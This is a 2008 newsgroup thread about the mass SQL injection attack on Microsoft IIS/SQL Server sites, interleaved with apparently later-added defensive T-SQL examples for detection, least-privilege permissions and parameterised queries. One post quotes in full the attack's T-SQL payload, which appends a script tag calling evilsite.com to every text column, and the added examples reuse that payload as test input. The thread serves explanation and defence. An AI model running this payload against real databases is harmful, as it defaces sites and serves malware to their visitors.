POV-Ray : Newsgroups : povray.off-topic : I promised not to mock ...
  I promised not to mock ... (Message 1 to 10 of 38)
From: Doctor John
Subject: I promised not to mock ...
Date: 28 Apr 2008 15:22:35
Message: <481623fb@news.povray.org>
http://blog.wired.com/monkeybites/2008/04/microsoft-datab.html

John

-- 
I will be brief but not nearly so brief as Salvador Dali, who gave the
world's shortest speech. He said, "I will be so brief I am already
finished," then he sat down.



From: Gail Shaw
Subject: Re: I promised not to mock ...
Date: 28 Apr 2008 16:10:08
Message: <48162f20@news.povray.org>
"Doctor John" <doc### [at] gmailcom> wrote in message
news:481623fb@news.povray.org...
> http://blog.wired.com/monkeybites/2008/04/microsoft-datab.html
>

From what I read, that's not the fault of any MS product, but of bad
developers not checking their DB input. SQL injection is just as possible on
a unix powered site with apache and oracle as it is with IIS and SQL server
(or IIS with MySQL, or IIS with Oracle, or apache windows with SQL server
...)

http://hackademix.net/2008/04/26/mass-attack-faq/

The attack is targeting Microsoft IIS web servers. Is it exploiting a
Microsoft vulnerability?
Yes and no. Web developers (or their employers who did not mandate proper
security education) are to blame for each single infection, because the SQL
injection exploited to infect the web sites is possible thanks to trivial
coding errors.
That said, the attackers are targeting IIS web servers which run ASP for a
reason.
Crackers put together a clever SQL procedure capable of polluting any
Microsoft SQL Server database in a generic way, with no need of knowing the
specific table and fields layouts:

-- Enumerate every column of every user table (xtype 'u') whose type is
-- ntext (99), text (35), nvarchar (231) or varchar (167).
DECLARE @T varchar(255), @C varchar(255)
DECLARE Table_Cursor CURSOR FOR
    select a.name, b.name from sysobjects a, syscolumns b
    where a.id = b.id and a.xtype = 'u'
      and (b.xtype = 99 or b.xtype = 35 or b.xtype = 231 or b.xtype = 167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0) BEGIN
    -- Append the script tag to the current value of each such column.
    -- convert(varchar, ...) with no length defaults to 30 characters, so
    -- anything beyond that in the original value is lost.
    exec('update [' + @T + '] set [' + @C + '] = rtrim(convert(varchar, [' + @C + '])) +
        ''<script src=http://evilsite.com/1.js></script>''')
    FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;

This is the "secret sauce" which is allowing the attack to reach its
impressive numbers, and it works exclusively against Microsoft database
technology - but it's a feature, not a bug (no irony intended this time).
Anyway, the chances for such "powerful" DB technology of being used in
conjunction with web servers different than IIS are very low.
So, to recap:

  1. There's no Microsoft-specific vulnerability involved: SQL injections
can happen (and do happen) on LAMP and other web application stacks as
well.
  2. SQL injections, and therefore these infections, are caused by poor
coding practices during web site development.
  3. Nonetheless, this mass automated epidemic is due to specific features
of Microsoft databases, allowing the exploit code to be generic, rather than
tailored for each single web site. Update: more details in this comment.


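The payload quoted above works because SQL Server's catalog lets an attacker find every text column without knowing the schema. The same trick serves the defender. What follows is an added example, not code from the thread or from the hackademix.net FAQ: a T-SQL script that walks the same four column types in every user table, reports which columns contain the injected tag, and (once you flip @DoCleanup) strips it. The marker string is the one in the quoted payload; the cursor and variable names are my own.

```sql
-- Added example; not from the original post or the hackademix.net FAQ it quotes.
-- Incident-response counterpart to the payload: walk every varchar/nvarchar/
-- text/ntext column of every user table and report rows carrying the injected
-- tag.  @Marker is taken from the payload quoted in the thread; substitute the
-- string actually seen in your logs.  Leave @DoCleanup at 0 until the hit list
-- has been reviewed.
DECLARE @Marker    nvarchar(200) = N'<script src=http://evilsite.com/1.js></script>';
DECLARE @DoCleanup bit = 0;
DECLARE @T sysname, @C sysname, @Wide nvarchar(20), @Sql nvarchar(max);

DECLARE col_cursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT QUOTENAME(SCHEMA_NAME(o.schema_id)) + N'.' + QUOTENAME(o.name),
           QUOTENAME(c.name),
           -- stay in the column's own encoding family when widening it
           CASE WHEN t.name IN ('nvarchar', 'ntext') THEN N'nvarchar(max)'
                ELSE N'varchar(max)' END
    FROM sys.objects o
    JOIN sys.columns c ON c.object_id = o.object_id
    JOIN sys.types   t ON t.user_type_id = c.user_type_id
    WHERE o.type = 'U'                                          -- user tables only
      AND t.name IN ('varchar', 'nvarchar', 'text', 'ntext');  -- xtype 167/231/35/99

OPEN col_cursor;
FETCH NEXT FROM col_cursor INTO @T, @C, @Wide;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- CHARINDEX rather than LIKE: the marker then needs no wildcard escaping.
    -- The marker travels as an sp_executesql parameter, not as pasted text.
    SET @Sql = N'SELECT ''' + @T + N'.' + @C + N''' AS col, COUNT(*) AS hits'
             + N' FROM ' + @T
             + N' WHERE CHARINDEX(@m, CAST(' + @C + N' AS ' + @Wide + N')) > 0'
             + N' HAVING COUNT(*) > 0;';
    EXEC sp_executesql @Sql, N'@m nvarchar(200)', @m = @Marker;

    IF @DoCleanup = 1
    BEGIN
        -- Remove the tag; cast back so text/ntext columns accept the result.
        SET @Sql = N'UPDATE ' + @T
                 + N' SET ' + @C + N' = CAST(REPLACE(CAST(' + @C + N' AS ' + @Wide
                 + N'), @m, N'''') AS ' + @Wide + N')'
                 + N' WHERE CHARINDEX(@m, CAST(' + @C + N' AS ' + @Wide + N')) > 0;';
        EXEC sp_executesql @Sql, N'@m nvarchar(200)', @m = @Marker;
    END

    FETCH NEXT FROM col_cursor INTO @T, @C, @Wide;
END
CLOSE col_cursor;
DEALLOCATE col_cursor;
```

Run it first as a login with read access only; the hit list tells you which tables the application's database user could write to, which is exactly the permission gap the attack needed. One caveat the detection cannot fix: the payload's rtrim(convert(varchar, ...)) has no length and therefore truncates each original value to 30 characters before appending the tag, so stripping the tag leaves the truncated value. Anything longer than that has to come back from a pre-infection backup.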

From: Doctor John
Subject: Re: I promised not to mock ...
Date: 28 Apr 2008 16:18:34
Message: <4816311a@news.povray.org>
Gail Shaw wrote:
> "Doctor John" <doc### [at] gmailcom> wrote in message
> news:481623fb@news.povray.org...
>> http://blog.wired.com/monkeybites/2008/04/microsoft-datab.html
>>
> 
> From what I read, that's not the fault of any MS product, but of bad
> developers not checking their DB input. SQL injection is just as possible on
> a unix powered site with apache and oracle as it is with IIS and SQL server
> (or IIS with MySQL, or IIS with Oracle, or apache windows with SQL server
> ...)
> 

I didn't say it was an M$ problem. I was just pointing at the numbers
involved.
As my subject line says: I promised not to mock :-)

(I may mock the developers tho ;) )

John

-- 
I will be brief but not nearly so brief as Salvador Dali, who gave the
world's shortest speech. He said, "I will be so brief I am already
finished," then he sat down.



From: Gail Shaw
Subject: Re: I promised not to mock ...
Date: 28 Apr 2008 16:23:22
Message: <4816323a@news.povray.org>
p.s.

The exploit also requires that the DB security is not using 'best practices'
(all data access through stored procedures, no rights to the base tables)
But if a developer/development team have left SQL injection vulnerabilities
in the front end, I somehow doubt they'll have got the DB security right.


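The permission layout Gail's p.s. describes, shown as an added example for SQL Server (not code from the thread). The web tier's database user gets EXECUTE on a stored procedure and nothing on the table behind it; ownership chaining lets the procedure read the table on the caller's behalf. The last part impersonates that user and attempts what the payload needs. Every name here (dbo.Products, dbo.GetProduct, WebApp, web_exec) is an assumption for illustration.

```sql
-- Added example, not from the original post: least-privilege layout for the
-- web tier on SQL Server.  All names are assumptions for illustration.
CREATE TABLE dbo.Products (ProductId int PRIMARY KEY, Name nvarchar(100), Description nvarchar(500));
INSERT INTO dbo.Products VALUES (1, N'Widget', N'A widget');
GO
-- The web tier gets its own database user and role.  WITHOUT LOGIN keeps the
-- demo self-contained; in production use CREATE USER WebApp FOR LOGIN <login>.
CREATE USER WebApp WITHOUT LOGIN;
CREATE ROLE web_exec;
EXEC sp_addrolemember 'web_exec', 'WebApp';   -- ALTER ROLE ... ADD MEMBER on 2012+
GO
CREATE PROCEDURE dbo.GetProduct @ProductId int AS
    SELECT ProductId, Name, Description FROM dbo.Products WHERE ProductId = @ProductId;
GO
-- EXECUTE on the procedure, nothing on the table.  dbo owns both objects, so
-- ownership chaining lets the procedure read Products without the caller
-- holding SELECT on it.
GRANT EXECUTE ON dbo.GetProduct TO web_exec;
GO
-- Now act as the web user and try what the payload in the thread needs.
EXECUTE AS USER = 'WebApp';

EXEC dbo.GetProduct @ProductId = 1;        -- succeeds through the procedure

-- The payload's first step, enumerating user tables, returns no rows: with no
-- permission on Products the table is not even visible in the catalog views.
SELECT name FROM sys.objects WHERE type = 'U';

-- The payload's second step, the UPDATE, is refused outright.
BEGIN TRY
    UPDATE dbo.Products
       SET Name = Name + N'<script src=http://evilsite.com/1.js></script>';
END TRY
BEGIN CATCH
    SELECT ERROR_MESSAGE() AS denied;      -- UPDATE permission was denied on 'Products'
END CATCH;

REVERT;
```

The point of the impersonation block is that the injection still happens in a badly coded front end; it just lands on a database user that can neither list the tables nor write to them, which turns a site-wide defacement into a failed statement in the error log. A web application connecting as dbo or sa gets none of this protection, whatever the procedures look like.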

From: Gail Shaw
Subject: Re: I promised not to mock ...
Date: 28 Apr 2008 16:32:24
Message: <48163458@news.povray.org>
"Doctor John" <doc### [at] gmailcom> wrote in message
news:4816311a@news.povray.org...
>
> I didn't say it was an M$ problem. I was just pointing at the numbers
> involved.

Due to the prevalence of ASP sites and the likelihood of ASP sites having a
SQL server backend. I wonder how many systems would be affected if the DB
code was changed to work on MySQL...

>
> (I may mock the developers tho ;) )
>

Please do. They should be taken out and shot. They give the rest of us a bad
name.
I wish people would learn something before they hack together (no pun
intended) a web site with database. It's so easy to get right, but so many
people get it so wrong, and this is the result.

Oh, for your amusement, here's a SQL injection with an Oracle backend. I
think it's using Java servlets. Not 100% sure.
http://thedailywtf.com/Articles/Oklahoma-Leaks-Tens-of-Thousands-of-Social-Security-Numbers,-Other-Sensitive-Data.aspx



From: Orchid XP v8
Subject: Re: I promised not to mock ...
Date: 28 Apr 2008 16:53:07
Message: <48163933$1@news.povray.org>
Gail Shaw wrote:

>> (I may mock the developers tho ;) )
> 
> Please do. They should be taken out and shot. They give the rest of us a bad
> name.
> I wish people would learn something before they hack together (no pun
> intended) a web site with database. It's so easy to get right, but so many
> people get it so wrong, and this is the result.

Arguably one might blame Microsoft for the whole "hey, computers are 
easy now, you don't need to bother learning how to use them properly" 
mentality.

Once upon a time [and it was a LONG time ago], you had to have PhDs to 
even understand how to switch on a computer... Obviously, that's a tad 
too far in the other direction, but M$ does seem to spend a lot of time 
yelling "hey, if you use VB everything will magically work without 
effort". It makes people think they don't need to bother learning how to 
do things properly.

So, not a technological flaw - more a mentality issue, if you will...


-- 
http://blog.orphi.me.uk/
http://www.zazzle.com/MathematicalOrchid*



From: Nicolas Alvarez
Subject: Re: I promised not to mock ...
Date: 28 Apr 2008 16:58:26
Message: <48163a72$1@news.povray.org>

> Arguably one might blame Microsoft for the whole "hey, computers are 
> easy now, you don't need to bother learning how to use them properly" 
> mentality.
> 
> Once upon a time [and it was a LONG time ago], you had to have PhDs to 
> even understand how to switch on a computer... Obviously, that's a tad 
> too far in the other direction, but M$ does seem to spend a lot of time 
> yelling "hey, if you use VB everything will magically work without 
> effort". It makes people think they don't need to bother learning how to 
> do things properly.

PHP too. Few people use prepared statements in PHP, they just 
concatenate strings into a SQL statement. And that's why PHP has such 
abominations as "magic quotes", to protect the developers against 
themselves, annoy to hell people who know what they're doing, and get 
backslashes all over your webpages.


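The distinction Nicolas draws for PHP, concatenating user input into the statement text versus binding it as a parameter, applies inside the database as well, and it is the caveat to "all data access through stored procedures": a procedure that assembles its own SQL by concatenation is as injectable as any ASP or PHP page. This added example (not code from the thread) shows both forms in T-SQL, the page's database, and feeds the same input to each. Table and procedure names are assumptions for illustration.

```sql
-- Added example, not from the original post.  Concatenation versus a
-- parameterised statement, inside SQL Server.  Names are assumptions.
CREATE TABLE dbo.Products (ProductId int PRIMARY KEY, Name nvarchar(200));
INSERT INTO dbo.Products VALUES (1, N'Widget'), (2, N'Gadget');
GO
-- Vulnerable: @Search is pasted into the statement text, so a quote in the
-- input ends the literal and whatever follows runs as SQL.
CREATE PROCEDURE dbo.SearchProducts_Unsafe @Search nvarchar(100) AS
    DECLARE @Sql nvarchar(max) =
        N'SELECT ProductId, Name FROM dbo.Products WHERE Name LIKE ''%' + @Search + N'%''';
    EXEC (@Sql);
GO
-- Hardened: the statement text is fixed; @Search travels as a bound parameter
-- of sp_executesql and can only ever be a value to compare against.
CREATE PROCEDURE dbo.SearchProducts @Search nvarchar(100) AS
    DECLARE @Sql nvarchar(max) =
        N'SELECT ProductId, Name FROM dbo.Products WHERE Name LIKE ''%'' + @s + ''%''';
    EXEC sp_executesql @Sql, N'@s nvarchar(100)', @s = @Search;
GO
-- Constructed input modelled on the thread's payload: close the literal, run
-- an UPDATE that appends the script tag to every Name, comment out the rest.
DECLARE @Payload nvarchar(100) =
    N'''; UPDATE dbo.Products SET Name = Name + ''<script src=http://evilsite.com/1.js></script>''; --';

EXEC dbo.SearchProducts_Unsafe @Search = @Payload;
SELECT Name FROM dbo.Products;   -- every Name now ends in the script tag

EXEC dbo.SearchProducts @Search = @Payload;   -- no rows: nothing is named like that
SELECT Name FROM dbo.Products;   -- unchanged by the second call
```

The unsafe procedure ends up executing `... WHERE Name LIKE '%'; UPDATE dbo.Products SET Name = Name + '<script ...>'; --%'`, which is the thread's attack in miniature. The hardened one sends the identical text to the server as the value of @s, and the server never parses it as SQL. Magic quotes, as Nicolas says, try to get the same effect by mangling the input; parameter binding gets it by never mixing input with code in the first place.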

From: Nicolas Alvarez
Subject: Re: I promised not to mock ...
Date: 28 Apr 2008 16:59:02
Message: <48163a96$1@news.povray.org>
Gail Shaw wrote:
> "Doctor John" <doc### [at] gmailcom> wrote in message
> news:481623fb@news.povray.org...
>> http://blog.wired.com/monkeybites/2008/04/microsoft-datab.html
>>
> 
> From what I read, that's not the fault of any MS product, but of bad
> developers not checking their DB input. SQL injection is just as possible on
> a unix powered site with apache and oracle as it is with IIS and SQL server
> (or IIS with MySQL, or IIS with Oracle, or apache windows with SQL server
> ...)

Yep, it was plain old SQL injection.

http://www.computerworld.com/action/article.do?command=printArticleBasic&articleId=9080678



From: Gail Shaw
Subject: Re: I promised not to mock ...
Date: 28 Apr 2008 17:05:09
Message: <48163c05@news.povray.org>
"Orchid XP v8" <voi### [at] devnull> wrote in message
news:48163933$1@news.povray.org...

>
> Arguably one might blame Microsoft for the whole "hey, computers are
> easy now, you don't need to bother learning how to use them properly"
> mentality.

Sorry, that's a cop-out. Blame someone else so you don't have to take
responsibility yourself.

SQL injection is mentioned in just about every single intro to web
development that I've seen. That includes the '... for dummies' and '... in
24 hours' type books, as well as all the help files and documentation that
comes with the MS development tools. If there's a computer-literate person
out there who doesn't know that security is important, then they've been
under a rock for 10 years.

To make matters worse, find me another profession where people are willing
to take the cheaper option?
If you had to, say, go for eye surgery, and your options were a surgeon with
10 years experience who wants to charge you a thousand pounds and an intern,
just out of med school who would do it for 200, which would you choose?
So, why in IT do people go for the cheapest option possible?

And if we're talking about computers are easy, no knowledge required,
shouldn't we also be blaming Apple?



From: Stephen
Subject: Re: I promised not to mock ...
Date: 28 Apr 2008 17:06:45
Message: <p0fc14l4hio4cnslvnn8edrrtbe968tgf4@4ax.com>
On Mon, 28 Apr 2008 21:53:34 +0100, Orchid XP v8 <voi### [at] devnull>
wrote:

>
>Once upon a time [and it was a LONG time ago], you had to have PhDs to 
>even understand how to switch on a computer... 

It was only the PhDs that thought that. The maintenance crew were
playing "Kingdom". ;)
-- 

Regards
     Stephen



